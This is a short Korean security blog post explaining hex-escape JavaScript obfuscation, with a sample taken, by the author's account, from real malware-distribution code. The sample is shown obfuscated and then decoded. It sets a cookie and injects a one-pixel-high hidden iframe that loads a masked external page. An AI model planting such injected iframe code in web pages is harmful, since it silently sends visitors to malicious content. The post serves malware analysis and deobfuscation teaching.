본문으로 바로가기

Hexdecimal Obfuscation #01

category Information Security 2013.06.10 15:16

16진수 값을 이용하여 만드는 Hexdecimal Obfuscation입니다.

간단하게 아스키 코드표의 16진수 값을 따라 난독화를 풀 수 있고, Malzilla 또는 Jsdetox 등 이용해서 난독화를 해제 할 수 있습니다.


난독화

if (document.cookie.indexOf('veatpr') == -1) {
    var expires = new Date();
    expires.setTime(expires.getTime() + 12 * 60 * 60 * 1000);
    document.cookie = 'veatpr=Yes;path=/;expires=' + expires.toGMTString();
    document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F
%77%77%77%2E%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2E%63%6F%6D%2F%75%73%65
%72%2F%70%6F%70%2F%70%6F%70%5F%70%68%6F%74%6F%74%2E%68%74%6D%6C%27%20%77%69%64%74%68%3D
%27%31%31%36%27%20%68%65%69%67%68%74%3D%27%31%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D
%27%30%27%3E%3C%2F%69%66%72%61%6D%65%3E"));
}


난독화 해제

if (document.cookie.indexOf('veatpr') == -1) {
    var expires = new Date();
    expires.setTime(expires.getTime() + 12 * 60 * 60 * 1000);
    document.cookie = 'veatpr=Yes;path=/;expires=' + expires.toGMTString();
    document.write(unescape("<iframe src='http://www.****************.com/user/pop/pop_photot.html' width='116' height='1' frameborder='0'>"));
}


* 실제 악성코드 유포하는 소스코드 중 샘플이기 때문에 일부 내용을 변경하였습니다.

'Information Security' 카테고리의 다른 글

Kaixin Exploit Tookit(Yszz 0.13)  (2) 2013.06.13
Gondad EK 최근 추세  (1) 2013.06.12
Hexdecimal Obfuscation #01  (0) 2013.06.10
Split Obfuscated  (0) 2013.06.07
JSMin Javascript Compressor  (0) 2013.06.07
Decimal Obfuscated  (0) 2013.05.21

댓글을 달아 주세요

티스토리 툴바